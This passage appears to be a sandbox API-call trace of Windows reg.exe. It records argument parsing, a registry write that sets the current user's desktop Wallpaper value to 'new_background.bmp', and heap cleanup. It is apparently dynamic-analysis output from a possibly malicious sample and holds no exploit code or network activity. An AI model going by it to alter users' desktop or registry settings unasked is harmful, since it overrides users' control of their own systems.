_Env=0x92f034, _DoWildCard=0, _StartInfo=0x92f010 | out: _Argc=0x92f030, _Argv=0x92f038, _Env=0x92f034) returned 0 [0039.751] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0039.752] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.752] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x23fc94 | out: phkResult=0x23fc94*=0x0) returned 0x2 [0039.753] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="add", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.753] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f0e0 [0039.753] lstrlenW (lpString="") returned 0 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x2) returned 0x474ce0 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474cf0 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f0f8 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474d10 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474d30 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474d50 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474d70 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f110 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474d90 [0039.753] GetProcessHeap () returned 0x460000 [0039.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474db0 [0039.753] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474dd0 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474df0 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f128 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474e10 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474e30 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474e50 [0039.754] GetProcessHeap () returned 0x460000 [0039.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474e88 [0039.754] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.755] GetProcessHeap () returned 0x460000 [0039.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f140 [0039.755] _memicmp (_Buf1=0x46f140, _Buf2=0x921318, _Size=0x7) returned 0 [0039.755] GetProcessHeap () returned 0x460000 [0039.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x1e) returned 0x473e70 [0039.755] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.755] GetProcessHeap () returned 0x460000 [0039.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f158 [0039.755] _memicmp (_Buf1=0x46f158, _Buf2=0x921318, _Size=0x7) returned 0 [0039.755] GetProcessHeap () returned 0x460000 [0039.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x56) returned 0x4757f0 [0039.755] _vsnwprintf (in: _Buffer=0x473e70, _BufferCount=0xe, _Format="|%s|", _ArgList=0x23fbb0 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0039.755] _vsnwprintf (in: _Buffer=0x4757f0, _BufferCount=0x2a, _Format="|%s|", _ArgList=0x23fbb0 | out: _Buffer="|HKEY_CURRENT_USER\\Control Panel\\Desktop|") returned 41 [0039.755] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0039.755] lstrlenW (lpString="|HKEY_CURRENT_USER\\Control Panel\\Desktop|") returned 41 [0039.755] SetLastError (dwErrCode=0x490) [0039.755] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.755] GetProcessHeap () returned 0x460000 [0039.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x50) returned 0x475850 [0039.755] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.755] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.755] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.755] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0039.756] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0039.756] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.757] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.757] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0039.757] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.757] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER\\Control Panel\\Desktop", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0039.757] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.757] lstrlenW (lpString="HKEY_CURRENT_USER\\Control Panel\\Desktop") returned 39 [0039.757] StrChrIW (lpStart="HKEY_CURRENT_USER\\Control Panel\\Desktop", wMatch=0x5c) returned="\\Control Panel\\Desktop" [0039.757] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0039.757] GetProcessHeap () returned 0x460000 [0039.757] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x28) returned 0x4759d0 [0039.757] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0039.757] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 2 [0039.757] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.757] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.758] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.758] StrChrIW (lpStart="Control Panel\\Desktop", wMatch=0x5c) returned="\\Desktop" [0039.758] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.758] StrChrIW (lpStart="Desktop", wMatch=0x5c) returned 0x0 [0039.758] SetLastError (dwErrCode=0x490) [0039.758] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.758] SetLastError (dwErrCode=0x0) [0039.758] lstrlenW (lpString="Control Panel\\Desktop") returned 21 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x2c) returned 0x475a00 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x58) returned 0x475a38 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x4759d0) returned 1 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4759d0) returned 0x28 [0039.758] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4759d0 | out: hHeap=0x460000) returned 1 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475850) returned 1 [0039.758] GetProcessHeap () returned 0x460000 [0039.758] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475850) returned 0x50 [0039.758] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475850 | out: hHeap=0x460000) returned 1 [0039.758] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0039.759] lstrlenW (lpString="Wallpaper") returned 9 [0039.759] GetProcessHeap () returned 0x460000 [0039.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474ea8 [0039.759] lstrlenW (lpString="Wallpaper") returned 9 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0039.759] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0039.759] lstrlenW (lpString="REG_SZ") returned 6 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.759] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0039.759] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0039.760] LocalFree (hMem=0x46f170) returned 0x0 [0039.760] SetLastError (dwErrCode=0x0) [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0039.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp") returned 48 [0039.760] GetProcessHeap () returned 0x460000 [0039.760] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x62) returned 0x475a98 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0039.760] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0039.760] SetLastError (dwErrCode=0x0) [0039.760] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x23fc44, lpdwDisposition=0x23fc1c | out: phkResult=0x23fc44*=0x70, lpdwDisposition=0x23fc1c*=0x2) returned 0x0 [0039.760] RegQueryValueExW (in: hKey=0x70, lpValueName="Wallpaper", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474ec8 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x14) returned 0x474ee8 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x10) returned 0x46f170 [0039.761] _memicmp (_Buf1=0x46f170, _Buf2=0x921318, _Size=0x7) returned 0 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x200) returned 0x475b08 [0039.761] LoadStringW (in: hInstance=0x0, uID=0xca, lpBuffer=0x475b08, cchBufferMax=256 | out: lpBuffer="Value %s exists, overwrite(Yes/No)? ") returned 0x24 [0039.761] lstrlenW (lpString="Value %s exists, overwrite(Yes/No)? ") returned 36 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x4a) returned 0x475850 [0039.761] _memicmp (_Buf1=0x46f170, _Buf2=0x921318, _Size=0x7) returned 0 [0039.761] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x475b08, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0039.761] lstrlenW (lpString="YNA") returned 3 [0039.761] GetProcessHeap () returned 0x460000 [0039.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x8) returned 0x4756a8 [0039.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp") returned 48 [0039.761] RegSetValueExW (in: hKey=0x70, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp", cbData=0x62 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\new_background.bmp") returned 0x0 [0039.762] RegCloseKey (hKey=0x70) returned 0x0 [0039.762] GetProcessHeap () returned 0x460000 [0039.762] GetProcessHeap () returned 0x460000 [0039.762] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475a00) returned 1 [0039.762] GetProcessHeap () returned 0x460000 [0039.762] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475a00) returned 0x2c [0039.762] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475a00 | out: hHeap=0x460000) returned 1 [0039.762] GetProcessHeap () returned 0x460000 [0039.769] GetProcessHeap () returned 0x460000 [0039.769] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475a38) returned 1 [0039.769] GetProcessHeap () returned 0x460000 [0039.769] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475a38) returned 0x58 [0039.769] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475a38 | out: hHeap=0x460000) returned 1 [0039.769] GetProcessHeap () returned 0x460000 [0039.769] GetProcessHeap () returned 0x460000 [0039.769] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474ea8) returned 1 [0039.769] GetProcessHeap () returned 0x460000 [0039.769] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474ea8) returned 0x14 [0039.771] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474ea8 | out: hHeap=0x460000) returned 1 [0039.771] GetProcessHeap () returned 0x460000 [0039.771] GetProcessHeap () returned 0x460000 [0039.771] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475a98) returned 1 [0039.771] GetProcessHeap () returned 0x460000 [0039.771] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475a98) returned 0x62 [0039.771] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475a98 | out: hHeap=0x460000) returned 1 [0039.771] SetLastError (dwErrCode=0x0) [0039.771] GetLastError () returned 0x0 [0039.771] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x23fbf0, nSize=0x0, Arguments=0x0 | out: lpBuffer="姐Gﯼ#ㅶ\x92ﲸ#㝓\x92") returned 0x27 [0039.877] GetLastError () returned 0x0 [0039.877] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.877] GetProcessHeap () returned 0x460000 [0039.877] GetProcessHeap () returned 0x460000 [0039.877] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474ce0) returned 1 [0039.877] GetProcessHeap () returned 0x460000 [0039.877] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474ce0) returned 0x2 [0039.877] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474ce0 | out: hHeap=0x460000) returned 1 [0039.878] GetProcessHeap () returned 0x460000 [0039.878] RtlAllocateHeap (HeapHandle=0x460000, Flags=0xc, Size=0x50) returned 0x475a28 [0039.878] SetLastError (dwErrCode=0x0) [0039.878] LocalFree (hMem=0x4759d0) returned 0x0 [0039.878] __iob_func () returned 0x77032900 [0039.878] _fileno (_File=0x77032920) returned 1 [0039.878] _errno () returned 0x6b07d8 [0039.878] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.878] _errno () returned 0x6b07d8 [0039.878] GetFileType (hFile=0x7) returned 0x2 [0039.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.879] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x23fbb0 | out: lpMode=0x23fbb0) returned 1 [0039.879] __iob_func () returned 0x77032900 [0039.879] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.879] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.879] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x475a28*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x23fbd8, lpReserved=0x0 | out: lpBuffer=0x475a28*, lpNumberOfCharsWritten=0x23fbd8*=0x27) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475b08) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475b08) returned 0x200 [0039.880] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475b08 | out: hHeap=0x460000) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f170) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f170) returned 0x10 [0039.880] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f170 | out: hHeap=0x460000) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474ee8) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.880] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474ee8) returned 0x14 [0039.880] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474ee8 | out: hHeap=0x460000) returned 1 [0039.880] GetProcessHeap () returned 0x460000 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x4757f0) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4757f0) returned 0x56 [0039.881] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4757f0 | out: hHeap=0x460000) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f158) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f158) returned 0x10 [0039.881] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f158 | out: hHeap=0x460000) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474e30) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474e30) returned 0x14 [0039.881] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474e30 | out: hHeap=0x460000) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x473e70) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x473e70) returned 0x1e [0039.881] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x473e70 | out: hHeap=0x460000) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x46f140) returned 1 [0039.881] GetProcessHeap () returned 0x460000 [0039.881] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x46f140) returned 0x10 [0039.882] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46f140 | out: hHeap=0x460000) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474e10) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474e10) returned 0x14 [0039.882] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474e10 | out: hHeap=0x460000) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x475a28) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x475a28) returned 0x50 [0039.882] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475a28 | out: hHeap=0x460000) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] HeapValidate (hHeap=0x460000, dwFlags=0x0, lpMem=0x474cf0) returned 1 [0039.882] GetProcessHeap () returned 0x460000 [0039.882] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474cf0) returned 0x14 [0039.882] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474cf0 | out: hHeap=0x460000) returned 1 [0039.882] GetProcessHeap () returned 